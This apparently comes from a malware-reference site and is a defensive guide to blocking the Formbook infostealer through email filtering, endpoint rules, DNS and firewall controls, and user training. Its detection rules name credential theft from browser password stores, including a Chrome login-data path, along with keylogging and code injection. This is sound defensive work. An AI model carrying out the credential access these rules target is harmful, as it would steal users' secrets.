Formbook - Protection Guide

Last updated: 2026-04-01

Formbook Malware Protection Guide

Attack Vectors to Block

Formbook primarily spreads through phishing emails containing malicious attachments or links. Blocking these vectors requires a layered defense strategy.

Email Vector: Formbook is commonly distributed via phishing campaigns using compressed attachments (ZIP, RAR) containing malicious executables disguised as invoices, order confirmations, or shipping documents. At the email gateway, implement policies to block or quarantine emails with executable attachments inside archives. Use content disarm and reconstruction (CDR) for Microsoft Office documents, as these are also used as downloaders.

Web Vector: Malicious links in emails lead to compromised websites or file-sharing services hosting Formbook payloads. Deploy a secure web gateway or proxy to block access to known malicious URLs and newly registered domains. Implement browser isolation for high-risk users to prevent drive-by downloads.

Endpoint Vector: Formbook relies on user execution. On endpoints, configure application control or application allowlisting to prevent unauthorized executables from running, especially from user writable directories like %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads. Restrict execution of script interpreters (PowerShell, WScript, CScript) with constrained language mode and logging enabled.

Email Security Configuration

Configure your email security gateway with the following specific rules to block Formbook delivery:

  1. Attachment Filtering:

    • Block emails with executable attachments (.exe, .scr, .js, .vbs, .ps1) regardless of extension hiding or double extensions.
    • Quarantine emails containing archive files (.zip, .rar, .7z) and implement automated sandbox analysis for these attachments before release.
    • Strip or quarantine macro-enabled Office documents (.docm, .xlsm) from untrusted senders by default.

  2. URL Filtering and Rewriting:

    • Enable time-of-click URL scanning for all links within emails. Block access to URLs categorized as malicious, suspicious, or newly registered.
    • Configure your gateway to rewrite all HTTP/HTTPS links, forcing them through your secure web proxy for inspection and logging.

  3. Sender and Content Policies:

    • Implement strict DMARC, DKIM, and SPF policies to reduce spoofed emails.
    • Use advanced anti-phishing heuristics to detect impersonation attempts (e.g., display name spoofing of common services like DHL, FedEx, or Microsoft).
    • Set up rules to flag emails with urgent financial language (“invoice overdue,” “payment required”) for additional review.

Endpoint Protection Tuning

Tune your endpoint detection and response (EDR) or antivirus solution to detect Formbook’s specific behaviors.

  1. Behavioral Detection Rules:

    • Create alerts for processes that perform keylogging or screenshot capture, especially by newly spawned, non-browser processes.
    • Detect processes that attempt to access credentials from browser password stores (files in %LocalAppData%\Google\Chrome\User Data\Default\Login Data or similar paths for other browsers).
    • Flag processes that inject code into legitimate processes like explorer.exe, svchost.exe, or browser processes-a common Formbook tactic for persistence and evasion.

  2. Application Control:

    • Deploy a robust application allowlisting policy. Allow execution only from %ProgramFiles%, %ProgramFiles(x86)%, %WINDIR%, and other trusted, administrator-controlled directories.
    • Explicitly block execution from high-risk user directories: %TEMP%, %APPDATA%, %USERPROFILE%\Downloads, and the Recycle Bin.

  3. Script Execution Restrictions:

    • Disable Windows Script Host (wscript.exe, cscript.exe) for everyday user profiles where not required for business.
    • Configure PowerShell to use Constrained Language Mode and enable deep script block logging (Module, ScriptBlock, and Transcription logging) to capture malicious PowerShell commands often used in download chains.

Network-Level Defenses

Block Formbook’s command-and-control (C2) communication and secondary payload retrieval at the network perimeter.

  1. DNS Filtering:

    • Subscribe to and enforce DNS filtering feeds that categorize and block malware, phishing, and newly seen domains.
    • Configure internal DNS servers to log and alert on DNS queries for domains with high-risk TLDs or domains that closely mimic legitimate brands (typosquatting).
    • Block DNS resolution for domains that are less than 30 days old (Newly Registered Domains) for standard user groups, as Formbook often uses freshly registered C2 domains.

  2. Proxy/Web Gateway Rules:

    • Block user access to free file-hosting and anonymous upload services commonly used for malware staging.
    • Decrypt and inspect HTTPS traffic (where legally and policy permitted) to detect malware beaconing or data exfiltration hidden in encrypted channels.
    • Set up outbound traffic rules to alert on connections to IP addresses on threat intelligence feeds associated with Formbook C2 servers.

  3. Firewall Policies:

    • Implement egress filtering at the network firewall. Restrict outbound connections from user workstations to only necessary ports and protocols, denying direct outbound connections on uncommon high ports.
    • Use your intrusion prevention system (IPS) or next-generation firewall to block traffic matching Formbook C2 signatures, such as specific HTTP POST request patterns or TLS certificate fingerprints associated with its infrastructure.

User Awareness Training Points

Training should focus on the specific social engineering lures used by Formbook campaigns.

  • Suspicious Attachments: Train users to treat any unsolicited email attachment with extreme caution, especially ZIP or RAR files. Emphasize that legitimate organizations rarely send executable files via email. Instruct them to verify the sender via a separate channel before opening.
  • Urgency and Fear Tactics: Highlight that Formbook emails often create a false sense of urgency (e.g., “Your account will be suspended,” “Action required on your invoice”). Teach users to recognize this pressure tactic and to pause and report such emails.
  • File Extension Deception: Show users real-world examples of how Formbook hides its executable nature, using icons of PDF or Word documents and file names like “Document.pdf.exe”. Train them to always enable viewing of file extensions in Windows Explorer.
  • Link Hovering: Reinforce the habit of hovering the mouse cursor over links in emails to preview the actual destination URL before clicking. Point out mismatches between the displayed link text and the true destination, a common trick in Formbook phishing.
  • Reporting Procedure: Ensure every user knows the exact, simple process for reporting a suspicious email (e.g., using the “Report Phish” button) to your security team. Quick reporting is critical for containing outbreaks.

For detailed information on how Formbook is distributed, refer to the Distribution Methods. For specific technical indicators, consult the Current IOCs. A general overview of the malware is available on the Formbook Overview page.

Related

← Formbook Overview How to Detect Removal Guide Incident Response IOCs Samples All Families